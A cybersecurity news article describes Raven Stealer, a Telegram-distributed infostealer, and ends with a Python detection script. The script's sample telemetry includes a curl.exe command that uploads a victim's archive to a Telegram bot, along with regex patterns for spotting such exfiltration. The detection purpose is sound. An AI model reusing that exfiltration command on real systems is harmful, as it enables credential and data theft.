Red Hot Cyber


Raven Stealer is here! The malware that steals your data by using Telegram as a “training tool.”

Redazione RHC : 30 July 2025 10:50

Amid growing activity by malicious campaigns that abuse legitimate communication channels to slip past traditional defenses, a new tool has caught the attention of security researchers: Raven Stealer. The information stealer surfaced in July 2025 and is already spreading via Telegram and GitHub, drawing notice not only for its feature set but for its combination of stealth, ease of use, and reliable delivery of stolen data.

Raven is currently the subject of lively discussion among threat analysts because it shows how antivirus and browser-integrated protection mechanisms can be bypassed with simple means. Raven Stealer is written in Delphi and C++ and targets Windows systems. It collects saved logins, payment card details, and autofill data from Chromium-based browsers, including Chrome and Edge. The malware is distributed through ZeroTrace's Telegram channel as a "training tool," and its built-in builder lets even inexperienced operators generate a ready-to-run payload and launch data-theft campaigns. Telegram also serves as the conduit for the stolen data: the payload posts its results to an operator-controlled bot, so no dedicated command-and-control server has to be set up or kept alive.

Builds are packed with UPX to hinder analysis and evade signature-based detection. Once launched, the malware injects an encrypted module directly into running browser processes through native system calls such as NtWriteVirtualMemory, so the module never has to be dropped to disk where file scanners would see it. Because the injected code executes inside the browser's own process, it can read passwords, cookies, and payment data from memory after the browser has decrypted them, sidestepping the encryption that protects those stores on disk. UPX packing by itself is not malicious, and plenty of legitimate software ships packed, so the packer is a triage signal rather than a verdict.

Raven also scans the system for cryptocurrency wallets, VPN clients, and game clients, and packages everything it finds into a ZIP archive stored under the victim's username. Exfiltration is handled by curl.exe, the command-line HTTP client that ships with current Windows releases, which uploads the archive, screenshots, and text lists of sensitive information to the operator through the Telegram Bot API; the only network destination is api.telegram.org, a legitimate service that many organizations cannot simply block. The behaviors map onto several MITRE ATT&CK techniques: Obfuscated Files or Information (T1027), Hide Artifacts: Hidden Window (T1564.003), File and Directory Discovery (T1083), Process Injection (T1055), Credentials from Web Browsers (T1555.003), and, for the use of Telegram as the communication channel, Web Service (T1102) and Exfiltration Over Web Service (T1567). Together these make the tool both effective and hard to spot.

The ZeroTrace team has been maintaining the project since the end of April 2025, publishing updates and source code on GitHub and Telegram. The malware has already been compared with another of their products, Octalyn Stealer, which points to a deliberate strategy of distributing simple but effective infostealers. As countermeasures, experts recommend monitoring for UPX-packed executables, browsers launched with non-standard command-line flags, curl.exe invocations, and connections to the Telegram API, complemented by behavioral analysis and monitoring of the native system calls used for injection.
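To make those recommendations concrete, the following Python script is an added example (not code from Red Hot Cyber, ZeroTrace, or the Raven Stealer project) that applies each of the recommended checks to endpoint telemetry. It assumes events shaped like Sysmon ProcessCreate (Event ID 1) and ProcessAccess (Event ID 10) records; the sample events are constructed for illustration, not captured from a real infection. The list of suspicious browser flags is an assumption, since the article only says "non-standard flags," and the UPX check relies on the default section names and marker the packer writes, which a modified packer can change.

```python
"""Endpoint detection checks for the Raven Stealer indicators the article lists:
UPX-packed binaries, browsers started with unusual flags, curl.exe invocations,
Telegram API access, and non-browser processes writing into browser memory.

Added example, not code from Red Hot Cyber, ZeroTrace, or Raven Stealer.
Event dicts loosely follow Sysmon ProcessCreate (ID 1) and ProcessAccess
(ID 10) fields. SAMPLE_EVENTS are constructed for illustration, not captured
telemetry. SUSPICIOUS_BROWSER_FLAGS is an assumed watch-list; the article
only says "non-standard flags".
"""
import re

BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe"}

# Assumption: flags an interactive user would not normally pass to a browser,
# but which tooling that wants a silent, debuggable browser instance often does.
SUSPICIOUS_BROWSER_FLAGS = ("--headless", "--remote-debugging-port",
                            "--no-sandbox", "--disable-gpu")

# Process access rights from WinNT.h that permit writing into another process.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
WRITE_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Telegram Bot API URLs embed the bot token: https://api.telegram.org/bot<id>:<secret>/<method>
TELEGRAM_BOT_API = re.compile(r"api\.telegram\.org/bot\d+:[A-Za-z0-9_-]+/", re.I)


def is_upx_packed(pe_bytes: bytes) -> bool:
    """Cheap static triage: stock UPX names its sections UPX0/UPX1 and writes a
    'UPX!' marker. A modified packer can rename both, so a miss proves nothing,
    and a hit only means "look closer": plenty of legitimate software is packed."""
    return b"UPX!" in pe_bytes or (b"UPX0" in pe_bytes and b"UPX1" in pe_bytes)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def analyze_event(event: dict) -> list:
    """Return the indicator names that a single telemetry event matches."""
    hits = []
    event_id = event.get("EventID")
    if event_id == 1:  # ProcessCreate
        image = basename(event.get("Image", ""))
        cmdline = event.get("CommandLine", "")
        if image == "curl.exe":
            hits.append("curl_invocation")
        if TELEGRAM_BOT_API.search(cmdline):
            hits.append("telegram_bot_api_in_cmdline")
        if image in BROWSERS:
            flags = [f for f in SUSPICIOUS_BROWSER_FLAGS if f in cmdline]
            if flags:
                hits.append("browser_nonstandard_flags:" + ",".join(flags))
    elif event_id == 10:  # ProcessAccess
        source = basename(event.get("SourceImage", ""))
        target = basename(event.get("TargetImage", ""))
        granted = int(event.get("GrantedAccess", "0x0"), 16)
        # A browser opening its own child processes is normal; anything else
        # asking for write/thread rights on a browser is how injection of the
        # kind described above (NtWriteVirtualMemory into the browser) shows up.
        if target in BROWSERS and source not in BROWSERS and granted & WRITE_MASK:
            hits.append("browser_memory_write_from:" + source)
    return hits


def scan(events) -> list:
    """Return (index, hits) for every event that matched at least one indicator."""
    results = []
    for i, event in enumerate(events):
        hits = analyze_event(event)
        if hits:
            results.append((i, hits))
    return results


CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"

# Constructed sample telemetry (not real logs). Paths and the bot token are made up.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": CHROME,
     "CommandLine": '"' + CHROME + '" --profile-directory=Default'},
    {"EventID": 1, "Image": CHROME,
     "CommandLine": '"' + CHROME + '" --headless --remote-debugging-port=9222 --no-sandbox'},
    {"EventID": 10, "SourceImage": r"C:\Users\Public\updater.exe",
     "TargetImage": CHROME, "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": CHROME,
     "TargetImage": CHROME, "GrantedAccess": "0x1FFFFF"},
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": 'curl.exe -F "document=@C:\\Users\\alice\\AppData\\Local\\Temp\\alice.zip" '
                    "https://api.telegram.org/bot123456:FAKE_TOKEN_FOR_EXAMPLE/sendDocument?chat_id=1"},
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe -sS https://example.com/healthz"},
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(index, hits)
```

Run the file directly to print the hits for the constructed events. In production the same logic belongs in a SIEM or EDR rule rather than a script; the important point is that none of the individual indicators is conclusive (curl.exe, UPX, and Telegram all have legitimate uses), so correlate them per host within a short time window before raising an alert.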

Raven Stealer is further proof of how easily technology can be turned into an underground profit tool. Under the guise of a "training tool" lies a predatory utility that does not teach but corrupts, shortening the path to crime and blurring the line between development and complicity.

Redazione
The editorial team of Red Hot Cyber consists of a group of individuals and anonymous sources who actively collaborate to provide early information and news on cybersecurity and computing in general.
